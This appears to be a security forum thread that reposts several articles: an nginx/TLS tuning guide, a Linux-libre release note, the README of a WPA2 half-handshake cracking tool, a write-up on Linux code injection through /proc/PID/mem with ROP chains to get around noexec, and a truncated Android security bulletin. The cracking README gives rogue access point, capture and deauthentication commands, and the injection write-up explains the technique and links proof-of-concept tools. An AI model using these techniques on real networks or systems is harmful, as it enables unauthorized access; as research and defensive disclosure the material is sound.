BoringSSL you do not need to worry about that). As a side note, it worth mentioning that bigger is not always better, e.g. using 4096 RSA certs will degrade your performance by 10x: $ bssl speed Did 1517 RSA 2048 signing ... (1507.3 ops/sec) Did 160 RSA 4096 signing ... (153.4 ops/sec) To make it worse, smaller isn’t necessarily the best choice either: by using non-common p-224 field for ECDSA you’ll get 60% worse performance compared to a more common p-256: $ bssl speed Did 7056 ECDSA P-224 signing ... (6831.1 ops/sec) Did 17000 ECDSA P-256 signing ... (16885.3 ops/sec) The rule of thumb here is that the most commonly used encryption is generally the most optimized one. When running properly optimized OpenTLS-based library using RSA certs, you should see the following traces in your perf top: AVX2-capable, but not ADX-capable boxes (e.g. Haswell) should use AVX2 codepath: 6.42% nginx [.] rsaz_1024_sqr_avx2 1.61% nginx [.] rsaz_1024_mul_avx2 While newer hardware should use a generic montgomery multiplication with ADX codepath: 7.08% nginx [.] sqrx8x_internal 2.30% nginx [.] mulx4x_internal Symmetric Encryption If you have lot’s of bulk transfers like videos, photos, or more generically files, then you may start observing symmetric encryption symbols in profiler’s output. Here you just need to make sure that your CPU has AES-NI support and you set your server-side preferences for AES-GCM ciphers. Properly tuned hardware should have following in perf top: 8.47% nginx [.] aesni_ctr32_ghash_6x But it’s not only your servers that will need to deal with encryption/decryption—your clients will share the same burden on a way less capable CPU. Without hardware acceleration this may be quite challenging, therefore you may consider using an algorithm that was designed to be fast without hardware acceleration, e.g. ChaCha20-Poly1305. This will reduce TTLB for some of your mobile clients. ChaCha20-Poly1305 is supported in BoringSSL out of the box, for OpenSSL 1.0.2 you may consider using Cloudflare patches. BoringSSL also supports “equal preference cipher groups,” so you may use the following config to let clients decide what ciphers to use based on their hardware capabilities (shamelessly stolen from cloudflare/sslconfig): ssl_ciphers '[ECDHE-ECDSA-AES128-GCM-SHA256|ECDHE-ECDSA-CHACHA20-POLY1305|ECDHE-RSA-AES128-GCM-SHA256|ECDHE-RSA-CHACHA20-POLY1305]:ECDHE+AES128:RSA+AES128:ECDHE+AES256:RSA+AES256:ECDHE+3DES:RSA+3DES'; ssl_prefer_server_ciphers on; Application level: Highlevel To analyze effectiveness of your optimizations on that level you will need to collect RUM data. In browsers you can use Navigation Timing APIs and Resource Timing APIs. Your main metrics are TTFB and TTV/TTI. Having that data in an easily queriable and graphable formats will greatly simplify iteration. Compression Compression in nginx starts with mime.types file, which defines default correspondence between file extension and response MIME type. Then you need to define what types you want to pass to your compressor with e.g. [gzip_types](http://nginx.org/en/docs/http/ngx_http_gzip_module.html#gzip_types). If you want the complete list you can use mime-db to autogenerate your mime.types and to add those with .compressible == true to gzip_types. When enabling gzip, be careful about two aspects of it: Increased memory usage. This can be solved by limiting gzip_buffers. Increased TTFB due to the buffering. This can be solved by using [gzip_no_buffer](http://hg.nginx.org/nginx/file/c7d4017c8876/src/http/modules/ngx_http_gzip_filter_module.c#l182). As a side note, http compression is not limited to gzip exclusively: nginx has a third party [ngx_brotli](https://github.com/google/ngx_brotli) module that can improve compression ratio by up to 30% compared to gzip. As for compression settings themselves, let’s discuss two separate use-cases: static and dynamic data. For static data you can archive maximum compression ratios by pre-compressing your static assets as a part of the build process. We discussed that in quite a detail in the Deploying Brotli for static content post for both gzip and brotli. For dynamic data you need to carefully balance a full roundtrip: time to compress the data + time to transfer it + time to decompress on the client. Therefore setting the highest possible compression level may be unwise, not only from CPU usage perspective, but also from TTFB. ## Buffering Buffering inside the proxy can greatly affect web server performance, especially with respect to latency. The nginx proxy module has various buffering knobs that are togglable on a per-location basis, each of them is useful for its own purpose. You can separately control buffering in both directions via proxy_request_buffering and proxy_buffering. If buffering is enabled the upper limit on memory consumption is set by client_body_buffer_size and proxy_buffers, after hitting these thresholds request/response is buffered to disk. For responses this can be disabled by setting proxy_max_temp_file_size to 0. Most common approaches to buffering are: Buffer request/response up to some threshold in memory and then overflow to disk. If request buffering is enabled, you only send a request to the backend once it is fully received, and with response buffering, you can instantaneously free a backend thread once it is ready with the response. This approach has the benefits of improved throughput and backend protection at the cost of increased latency and memory/io usage (though if you use SSDs that may not be much of a problem). No buffering. Buffering may not be a good choice for latency sensitive routes, especially ones that use streaming. For them you may want to disable it, but now your backend needs to deal with slow clients (incl. malicious slow-POST/slow-read kind of attacks). Application-controlled response buffering through the [X-Accel-Buffering](https://www.nginx.com/resources/wiki/start/topics/examples/x-accel/#x-accel-buffering) header. Whatever path you choose, do not forget to test its effect on both TTFB and TTLB. Also, as mentioned before, buffering can affect IO usage and even backend utilization, so keep an eye out for that too. TLS Now we are going to talk about high-level aspects of TLS and latency improvements that could be done by properly configuring nginx. Most of the optimizations I’ll be mentioning are covered in the High Performance Browser Networking’s “Optimizing for TLS” section and Making HTTPS Fast(er) talk at nginx.conf 2014. Tunings mentioned in this part will affect both performance and security of your web server, if unsure, please consult with Mozilla’s Server Side TLS Guide and/or your Security Team. To verify the results of optimizations you can use: WebpageTest for impact on performance. SSL Server Test from Qualys, or Mozilla TLS Observatory for impact on security. Session resumption As DBAs love to say “the fastest query is the one you never make.” The same goes for TLS—you can reduce latency by one RTT if you cache the result of the handshake. There are two ways of doing that: You can ask the client to store all session parameters (in a signed and encrypted way), and send it to you during the next handshake (similar to a cookie). On the nginx side this is configured via the ssl_session_tickets directive. This does not not consume any memory on the server-side but has a number of downsides: You need the infrastructure to create, rotate, and distribute random encryption/signing keys for your TLS sessions. Just remember that you really shouldn’t 1) use source control to store ticket keys 2) generate these keys from other non-ephemeral material e.g. date or cert. PFS won’t be on a per-session basis but on a per-tls-ticket-key basis, so if an attacker gets a hold of the ticket key, they can potentially decrypt any captured traffic for the duration of the ticket. Your encryption will be limited to the size of your ticket key. It does not make much sense to use AES256 if you are using 128-bit ticket key. Nginx supports both 128 bit and 256 bit TLS ticket keys. Not all clients support ticket keys (all modern browsers do support them though). Or you can store TLS session parameters on the server and only give a reference (an id) to the client. This is done via the ssl_session_cache directive. It has a benefit of preserving PFS between sessions and greatly limiting attack surface. Though ticket keys have downsides: They consume ~256 bytes of memory per session on the server, which means you can’t store many of them for too long. They can not be easily shared between servers. Therefore you either need a loadbalancer which will send the same client to the same server to preserve cache locality, or write a distributed TLS session storage on top off something like [ngx_http_lua_module](https://github.com/openresty/lua-resty-core/blob/master/lib/ngx/ssl/session.md). As a side note, if you go with session ticket approach, then it’s worth using 3 keys instead of one, e.g.: ssl_session_tickets on; ssl_session_timeout 1h; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_curr; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_prev; ssl_session_ticket_key /run/nginx-ephemeral/nginx_session_ticket_next; You will be always encrypting with the current key, but accepting sessions encrypted with both next and previous keys. OCSP Stapling You should staple your OCSP responses, since otherwise: Your TLS handshake may take longer because the client will need to contact the certificate authority to fetch OCSP status. On OCSP fetch failure may result in availability hit. You may compromise users’ privacy since their browser will contact a third party service indicating that they want to connect to your site. To staple the OCSP response you can periodically fetch it from your certificate authority, distribute the result to your web servers, and use it with the ssl_stapling_file directive: ssl_stapling_file /var/cache/nginx/ocsp/www.der; TLS record size TLS breaks data into chunks called records, which you can’t verify and decrypt until you receive it in its entirety. You can measure this latency as the difference between TTFB from the network stack and application points of view. By default nginx uses 16k chunks, which do not even fit into IW10 congestion window, therefore require an additional roundtrip. Out-of-the box nginx provides a way to set record sizes via ssl_buffer_size directive: To optimize for low latency you should set it to something small, e.g. 4k. Decreasing it further will be more expensive from a CPU usage perspective. To optimize for high throughput you should leave it at 16k. There are two problems with static tuning: You need to tune it manually. You can only set ssl_buffer_size on a per-nginx config or per-server block basis, therefore if you have a server with mixed latency/throughput workloads you’ll need to compromize. There is an alternative approach: dynamic record size tuning. There is an nginx patch from Cloudflare that adds support for dynamic record sizes. It may be a pain to initially configure it, but once you over with it, it works quite nicely. ******TLS 1.3** TLS 1.3 features indeed sound very nice, but unless you have resources to be troubleshooting TLS full-time I would suggest not enabling it, since: It is still a draft. 0-RTT handshake has some security implications. And your application needs to be ready for it. There are still middleboxes (antiviruses, DPIs, etc) that block unknown TLS versions. ## Avoid Eventloop Stalls Nginx is an eventloop-based web server, which means it can only do one thing at a time. Even though it seems that it does all of these things simultaneously, like in time-division multiplexing, all nginx does is just quickly switches between the events, handling one after another. It all works because handling each event takes only couple of microseconds. But if it starts taking too much time, e.g. because it requires going to a spinning disk, latency can skyrocket. If you start noticing that your nginx are spending too much time inside the ngx_process_events_and_timers function, and distribution is bimodal, then you probably are affected by eventloop stalls. # funclatency '/srv/nginx-bazel/sbin/nginx:ngx_process_events_and_timers' -m msecs : count distribution 0 -> 1 : 3799 |****************************************| 2 -> 3 : 0 | | 4 -> 7 : 0 | | 8 -> 15 : 0 | | 16 -> 31 : 409 |**** | 32 -> 63 : 313 |*** | 64 -> 127 : 128 |* | AIO and Threadpools Since the main source of eventloop stalls especially on spinning disks is IO, you should probably look there first. You can measure how much you are affected by it by running fileslower: # fileslower 10 Tracing sync read/writes slower than 10 ms TIME(s) COMM TID D BYTES LAT(ms) FILENAME 2.642 nginx 69097 R 5242880 12.18 0002121812 4.760 nginx 69754 W 8192 42.08 0002121598 4.760 nginx 69435 W 2852 42.39 0002121845 4.760 nginx 69088 W 2852 41.83 0002121854 To fix this, nginx has support for offloading IO to a threadpool (it also has support for AIO, but native AIO in Unixes have lots of quirks, so better to avoid it unless you know what you doing). A basic setup consists of simply: aio threads; aio_write on; For more complicated cases you can set up custom [thread_pool](http://nginx.org/en/docs/ngx_core_module.html#thread_pool)‘s, e.g. one per-disk, so that if one drive becomes wonky, it won’t affect the rest of the requests. Thread pools can greatly reduce the number of nginx processes stuck in D state, improving both latency and throughput. But it won’t eliminate eventloop stalls fully, since not all IO operations are currently offloaded to it. Logging Writing logs can also take a considerable amount of time, since it is hitting disks. You can check whether that’s that case by running ext4slower and looking for access/error log references: # ext4slower 10 TIME COMM PID T BYTES OFF_KB LAT(ms) FILENAME 06:26:03 nginx 69094 W 163070 634126 18.78 access.log 06:26:08 nginx 69094 W 151 126029 37.35 error.log 06:26:13 nginx 69082 W 153168 638728 159.96 access.log It is possible to workaround this by spooling access logs in memory before writing them by using buffer parameter for the access_log directive. By using gzip parameter you can also compress the logs before writing them to disk, reducing IO pressure even more. But to fully eliminate IO stalls on log writes you should just write logs via syslog, this way logs will be fully integrated with nginx eventloop. Open file cache Since open(2) calls are inherently blocking and web servers are routinely opening/reading/closing files it may be beneficial to have a cache of open files. You can see how much benefit there is by looking at ngx_open_cached_file function latency: # funclatency /srv/nginx-bazel/sbin/nginx:ngx_open_cached_file -u usecs : count distribution 0 -> 1 : 10219 |****************************************| 2 -> 3 : 21 | | 4 -> 7 : 3 | | 8 -> 15 : 1 | | If you see that either there are too many open calls or there are some that take too much time, you can can look at enabling open file cache: open_file_cache max=10000; open_file_cache_min_uses 2; open_file_cache_errors on; After enabling open_file_cache you can observe all the cache misses by looking at opensnoop and deciding whether you need to tune the cache limits: # opensnoop -n nginx PID COMM FD ERR PATH 69435 nginx 311 0 /srv/site/assets/serviceworker.js 69086 nginx 158 0 /srv/site/error/404.html ... Wrapping up All optimizations that were described in this post are local to a single web server box. Some of them improve scalability and performance. Others are relevant if you want to serve requests with minimal latency or deliver bytes faster to the client. But in our experience a huge chunk of user-visible performance comes from a more high-level optimizations that affect behavior of the Dropbox Edge Network as a whole, like ingress/egress traffic engineering and smarter Internal Load Balancing. These problems are on the edge (pun intended) of knowledge, and the industry has only just started approaching them. If you’ve read this far you probably want to work on solving these and other interesting problems! You’re in luck: Dropbox is looking for experienced SWEs, SREs, and Managers. Sursa: https://blogs.dropbox.com/tech/2017/09/optimizing-web-servers-for-high-throughput-and-low-latency/
  11. GNU Linux-Libre 4.13 Kernel Launches Officially for Those Who Seek 100% Freedom It is based on the Linux 4.13 kernel series Sep 6, 2017 19:13 GMT · By Marius Nestor · Alexandre Oliva, the maintainer of the GNU Linux-libre project, an Open Source initiative to provide a 100% free version of the Linux kernel to those who seek 100% freedom, announced the release of the GNU Linux-libre 4.13 kernel. New GNU Linux-libre releases always come out a few days after the final release of a new Linux kernel branch. Therefore, as Linux kernel 4.13 was officially unveiled this past weekend by Linus Torvalds, it's time for a new GNU Linux-libre version, in this case GNU Linux-libre 4.13. The GNU Linux-libre 4.13 kernel appears to be a big release that deblobbed more drivers than the previous one. Among the drivers that needed deblobbing, we can mention both the Qualcomm Venus V4L2 encoder and decoder, Qualcomm's ADSP and WCNSS, as well as Inside Secure's SafeXcel cryptographic engine. The Mellanox Technologies Spectrum, Cavium Nitrox CNN55XX, and Quantenna QSR10g drivers needed deblobbing as well in GNU Linux-libre 4.13, which also adds small modifications to the per-release deblobbing logic for the Redpine Signals WLAN, IWLWIFI, and AMDGPU drivers because the source code was rearranged. Once deblobbed the kernel is compiled as usual According to the mailing list announcement, deblobbing was also required for the ath10k, Adreno A5xx, brcmfmac, Intel i915 CSR, Silead DMI, and wil6210 drivers. The GNU Linux-libre developers have revealed the fact that version 4.13, which is based on Linux kernel 4.13, will compile as usual once deblobbed. Therefore, if you're looking to have a 100% free operating system running under the hood of your personal computer, we recommend downloading and compiling the GNU Linux-libre 4.13 kernel. If not, you can go ahead and upgrade to the Linux 4.13 kernel, which is also available for download right now on our website or from kernel.org. Sursa: http://news.softpedia.com/news/gnu-linux-libre-4-13-launches-officially-for-those-who-seek-100-freedom-517624.shtml
  12. WPA2-HalfHandshake-Crack Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full fourway handshake is then used in a dictonary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client withen range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake. For more information on general wifi hacking, see here Install $ sudo python setup.py install Sample use $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1" -r Where to read input pcap file with half handshake (works with full handshakes too) -m AP mac address (From the 'fake' access point that was used during the capture) -s AP SSID -d (optional) Where to read dictionary from Capturing half handshakes To listen for device probes the aircrack suite can be used as follows sudo airmon-ng start wlan0 sudo airodump-ng mon0 You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything In ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/ Capture traffic on this interface. In linux this can be achived with TCPdump sudo tcpdump -i wlan0 -s 65535 -w file.cap (optional) Deauthenticate clients from nearby WiFi networks to increase probes If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication Sursa: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
      • 2
      • Upvote
      • Thanks
  13. Linux based inter-process code injection without ptrace(2) Tuesday, September 5, 2017 at 5:01AM Using the default permission settings found in most major Linux distributions it is possible for a user to gain code injection in a process, without using ptrace. Since no syscalls are required using this method, it is possible to accomplish the code injection using a language as simple and ubiquitous as Bash. This allows execution of arbitrary native code, when only a standard Bash shell and coreutils are available. Using this technique, we will show that the noexec mount flag can be bypassed by crafting a payload which will execute a binary from memory. The /proc filesystem on Linux offers introspection of the running of the Linux system. Each process has its own directory in the filesystem, which contains details about the process and its internals. Two pseudo files of note in this directory are maps and mem. The maps file contains a map of all the memory regions allocated to the binary and all of the included dynamic libraries. This information is now relatively sensitive as the offsets to each library location are randomised by ASLR. Secondly, the mem file provides a sparse mapping of the full memory space used by the process. Combined with the offsets obtained from the maps file, the mem file can be used to read from and write directly into the memory space of a process. If the offsets are wrong, or the file is read sequentially from the start, a read/write error will be returned, because this is the same as reading unallocated memory, which is inaccessible. The read/write permissions on the files in these directories are determined by the ptrace_scope file in /proc/sys/kernel/yama, assuming no other restrictive access controls are in place (such as SELinux or AppArmor). The Linux kernel offers documentation for the different values this setting can be set to. For the purposes of this injection, there are two pairs of settings. The lower security settings, 0 and 1, allow either any process under the same uid, or just the parent process, to write to a processes /proc/${PID}/mem file, respectively. Either of these settings will allow for code injection. The more secure settings, 2 and 3, restrict writing to admin-only, or completely block access respectively. Most major operating systems were found to be configured with ‘1’ by default, allowing only the parent of a process to write into its /proc/${PID}/mem file. This code injection method utilises these files, and the fact that the stack of a process is stored inside a standard memory region. This can be seen by reading the maps file for a process: $ grep stack /proc/self/maps 7ffd3574b000-7ffd3576c000 rw-p 00000000 00:00 0 [stack] Among other things, the stack contains the return address (on architectures that do not use a ‘link register’ to store the return address, such as ARM), so a function knows where to continue execution when it has completed. Often, in attacks such as buffer overflows, the stack is overwritten, and the technique known as ROP is used to assert control over the targeted process. This technique replaces the original return address with an attacker controlled return address. This will allow an attacker to call custom functions or syscalls by controlling execution flow every time the ret instruction is executed. This code injection does not rely on any kind of buffer overflow, but we do utilise a ROP chain. Given the level of access we are granted, we can directly overwrite the stack as present in /proc/${PID}/mem. Therefore, the method uses the /proc/self/maps file to find the ASLR random offsets, from which we can locate functions inside a target process. With these function addresses we can replace the normal return addresses present on the stack and gain control of the process. To ensure that the process is in an expected state when we are overwriting the stack, we use the sleep command as the slave process which is overwritten. The sleep command uses the nanosleep syscall internally, which means that the sleep command will sit inside the same function for almost its entire life (excluding setup and teardown). This gives us ample opportunity to overwrite the stack of the process before the syscall returns, at which point we will have taken control with our manufactured chain of ROP gadgets. To ensure that the location of the stack pointer at the time of the syscall execution, we prefix our payload with a NOP sled, which will allow the stack pointer to be at almost any valid location, which upon return will just increase the stack pointer until it gets to and executes our payload. A general purpose implementation for code injection can be found at https://github.com/GDSSecurity/Dunkery. Efforts were made to limit the external dependencies of this script, as in some very restricted environments utility binaries may not be available. The current list of dependencies are: GNU grep (Must support -Fao --byte-offset) dd (required for reading/writing to an absolute offset into a file) Bash (for the math and other advanced scripting features) The general flow of this script is as follows: Launch a copy of sleep in the background and record its process id (PID). As mentioned above, the sleep command is an ideal candidate for injection as it only executes one function for its whole life, meaning we won’t end up with unexpected state when overwriting the stack. We use this process to find out which libraries are loaded when the process is instantiated. Using /proc/${PID}/maps we try to find all the gadgets we need. If we can’t find a gadget in the automatically loaded libraries we will expand our search to system libraries in /usr/lib. If we then find the gadget in any other library we can load that library into our next slave using LD_PRELOAD. This will make the missing gadgets available to our payload. We also verify that the gadgets we find (using a naive ‘grep’) are within the .text section of the library. If they are not, there is a risk they will not be loaded in executable memory on execution, causing a crash when we try to return to the gadget. This ‘preload’ stage should result in a possibly empty list of libraries containing gadgets missing from the standard loaded libraries. Once we have confirmed all gadgets can be available to us, we launch another sleep process, LD_PRELOADing the extra libraries if necessary. We now re-find the gadgets in the libraries, and we relocate them to the correct ASLR base, so we know their location in the memory space of the target region, rather than just the binary on disk. As above, we verify that the gadget is in an executable memory region before we commit to using it. The list of gadgets we require is relatively short. We require a NOP for the above discussed NOP sled, enough POP gadgets to fill all registers required for a function call, a gadget for calling a syscall, and a gadget for calling a standard function. This combination will allow us to call any function or syscall, but does not allow us to perform any kind of logic. Once these gadgets have been located, we can convert pseudo instructions from our payload description file into a ROP payload. For example, for a 64bit system, the line ‘syscall 60 0’ will convert to ROP gadgets to load ‘60’ into the RAX register, ‘0’ into RDI, and a syscall gadget. This should result in 40 bytes of data: 3 addresses and 2 constants, all 8 bytes. This syscall, when executed, would call exit(0). We can also call functions present in the PLT, which includes functions imported from external libraries, such as glibc. To locate the offsets for these functions, as they are called by pointer rather than syscall number, we need to first parse the ELF section headers in the target library to find the function offset. Once we have the offset we can relocate these as with the gadgets, and add them to our payload. String arguments have also been handled, as we know the location of the stack in memory, so we can append strings to our payload and add pointers to them as necessary. For example, the fexecve syscall requires a char** for the arguments array. We can generate the array of pointers before injection inside our payload and upon execution the pointer on the stack to the array of pointers can be used as with a normal stack allocated char**. Once the payload has been fully serialized, we can overwrite the stack inside the process using dd, and the offset to the stack obtained from the /proc/${PID}/maps file. To ensure that we do not encounter any permissions issues, it is necessary for the injection script to end with the ‘exec dd’ line, which replaces the bash process with the dd process, therefore transferring parental ownership over the sleep program from bash to dd. After the stack has been overwritten, we can then wait for the nanosleep syscall used by the sleep binary to return, at which point our ROP chain gains control of the application and our payload will be executed. The specific payload to be injected as a ROP chain can reasonably be anything that does not require runtime logic. The current payload in use is a simple open/memfd_create/sendfile/fexecve program. This disassociates the target binary with the filesystem noexec mount flag, and the binary is then executed from memory, bypassing the noexec restriction. Since the sleep binary is backgrounded on execution by bash, it is not possible to interact with the binary to be executed, as it does not have a parent after dd exits. To bypass this restriction, it is possible to use one of the examples present in the libfuse distribution, assuming fuse is present on the target system: the passthrough binary will create a mirrored mount of the root filesystem to the destination directory. This new mount is not mounted noexec, and therefore it is possible to browse through this new mount to a binary, which will then be executable. A proof of concept video shows this passthrough payload allowing execution of a binary in the current directory, as a standard child of the shell. Future work: To speed up execution, it would be useful to cache the gadget offset from its respective ASLR base between the preload and the main run. This could be accomplished by dumping an associative array to disk using declare -p, but touching disk is not necessarily always appropriate. Alternatives include rearchitecting the script to execute the payload script in the same environment as the main bash process, rather than a child executed using $(). This would allow for the sharing of environmental variables bidirectionally. Limit the external dependencies further by removing the requirement for GNU grep. This was previously attempted and deemed too slow when finding gadgets, but may be possible with more optimised code. The obvious mitigation strategy for this technique is to set ptrace_scope to a more restrictive value. A value of 2 (superuser only) is the minimum that would block this technique, whilst not completely disabling ptrace on the system, but care should be taken to ensure that ptrace as a normal user is not in use. This value can be set by adding the following line to /etc/sysctl.conf: kernel.yama.ptrace_scope=2 Other mitigation strategies include combinations of Seccomp, SELinux or Apparmor to restrict the permissions on sensitive files such as /proc/${PID}/maps or /proc/${PID}/mem. The proof of concept code, and Bash ROP generator can be found at https://github.com/GDSSecurity/Cexigua Rory McNamara Sursa: https://blog.gdssecurity.com/labs/2017/9/5/linux-based-inter-process-code-injection-without-ptrace2.html
      • 1
      • Upvote
  14. Android Security Bulletin—September 2017 Published September 5, 2017 The Android Security Bulletin contains details of security vulnerabilities affecting Android devices. Security patch levels of September 05, 2017 or later address all of these issues. Refer to the Pixel and Nexus update schedule to learn how to check a device's security patch level. Partners were notified of the issues described in the bulletin at least a month ago. Source code patches for these issues will be released to the Android Open Source Project (AOSP) repository in the next 7 days. We will revise this bulletin with the AOSP links when they are available. The most severe of these issues is a critical severity vulnerability in media framework that could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. The severity assessment is based on the effect that exploiting the vulnerability would possibly have on an affected device, assuming the platform and service mitigations are turned off for development purposes or if successfully bypassed. We have had no reports of active customer exploitation or abuse of these newly reported issues. Refer to the Android and Google Play Protect mitigations section for details on the Android security platform protections and Google Play Protect, which improve the security of the Android platform. We encourage all customers to accept these updates to their devices. Note: Information on the latest over-the-air update (OTA) and firmware images for Google devices is available in the Google device updates section. Announcements This bulletin has two security patch level strings to provide Android partners with the flexibility to more quickly fix a subset of vulnerabilities that are similar across all Android devices. See Common questions and answers for additional information: 2017-09-01: Partial security patch level string. This security patch level string indicates that all issues associated with 2017-09-01 (and all previous security patch level strings) are addressed. 2017-09-05: Complete security patch level string. This security patch level string indicates that all issues associated with 2017-09-01 and 2017-09-05 (and all previous security patch level strings) are addressed. Android and Google service mitigations This is a summary of the mitigations provided by the Android security platform and service protections such as Google Play Protect. These capabilities reduce the likelihood that security vulnerabilities could be successfully exploited on Android. Exploitation for many issues on Android is made more difficult by enhancements in newer versions of the Android platform. We encourage all users to update to the latest version of Android where possible. The Android security team actively monitors for abuse through Google Play Protect and warns users about Potentially Harmful Applications. Google Play Protect is enabled by default on devices with Google Mobile Services, and is especially important for users who install apps from outside of Google Play. 2017-09-01 security patch level—Vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2017-09-01 patch level. Vulnerabilities are grouped under the component that they affect. There is a description of the issue and a table with the CVE, associated references, type of vulnerability, severity, and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Framework The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to additional permissions. CVE References Type Severity Updated AOSP versions CVE-2017-0752 A-62196835 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 Libraries The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of an unprivileged process. CVE References Type Severity Updated AOSP versions CVE-2017-0753 A-62218744 RCE High 7.1.1, 7.1.2, 8.0 CVE-2017-6983 A-63852675 RCE High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0755 A-32178311 EoP High 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 Media Framework The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Updated AOSP versions CVE-2017-0756 A-34621073 RCE Critical 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0757 A-36006815 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0758 A-36492741 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0759 A-36715268 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0760 A-37237396 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0761 A-38448381 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0762 A-62214264 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0763 A-62534693 RCE Critical 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0764 A-62872015 RCE Critical 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0765 A-62872863 RCE Critical 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0766 A-37776688 RCE High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0767 A-37536407 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0768 A-62019992 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0769 A-37662122 EoP High 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0770 A-38234812 EoP High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0771 A-37624243 DoS High 7.0, 7.1.1, 7.1.2 CVE-2017-0772 A-38115076 DoS High 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0773 A-37615911 DoS High 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0774 A-62673844 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 CVE-2017-0775 A-62673179 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 CVE-2017-0776 A-38496660 ID Moderate 7.0, 7.1.1, 7.1.2, 8.0 DoS High 6.0.1 CVE-2017-0777 A-38342499 ID Moderate 7.0, 7.1.1, 7.1.2 DoS High 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1 CVE-2017-0778 A-62133227 ID Moderate 7.0, 7.1.1, 7.1.2 DoS High 5.0.2, 5.1.1, 6.0, 6.0.1 CVE-2017-0779 A-38340117 ID Moderate 4.4.4, 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 Runtime The most severe vulnerability in this section could enable a remote attacker using a specially crafted file to cause an application to hang. CVE References Type Severity Updated AOSP versions CVE-2017-0780 A-37742976 DoS High 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2, 8.0 System The most severe vulnerability in this section could enable a local malicious application to bypass user interaction requirements in order to gain access to user data. CVE References Type Severity Updated AOSP versions CVE-2017-0784 A-37287958 EoP Moderate 5.0.2, 5.1.1, 6.0, 6.0.1, 7.0, 7.1.1, 7.1.2 2017-09-05 security patch level—Vulnerability details In the sections below, we provide details for each of the security vulnerabilities that apply to the 2017-09-05 patch level. Vulnerabilities are grouped under the component that they affect and include details such as the CVE, associated references, type of vulnerability, severity, component (where applicable), and updated AOSP versions (where applicable). When available, we link the public change that addressed the issue to the bug ID, like the AOSP change list. When multiple changes relate to a single bug, additional references are linked to numbers following the bug ID. Broadcom components The most severe vulnerability in this section could enable a proximate attacker using a specially crafted file to execute arbitrary code within the context of a privileged process. CVE References Type Severity Component CVE-2017-7065 A-62575138* B-V2017061202 RCE Critical Wi-Fi driver CVE-2017-0786 A-37351060* B-V2017060101 EoP High Wi-Fi driver CVE-2017-0787 A-37722970* B-V2017053104 EoP Moderate Wi-Fi driver CVE-2017-0788 A-37722328* B-V2017053103 EoP Moderate Wi-Fi driver CVE-2017-0789 A-37685267* B-V2017053102 EoP Moderate Wi-Fi driver CVE-2017-0790 A-37357704* B-V2017053101 EoP Moderate Wi-Fi driver CVE-2017-0791 A-37306719* B-V2017052302 EoP Moderate Wi-Fi driver CVE-2017-0792 A-37305578* B-V2017052301 ID Moderate Wi-Fi driver Imgtk components The most severe vulnerability in this section could enable a local malicious application to access data outside of its permission levels. CVE References Type Severity Component CVE-2017-0793 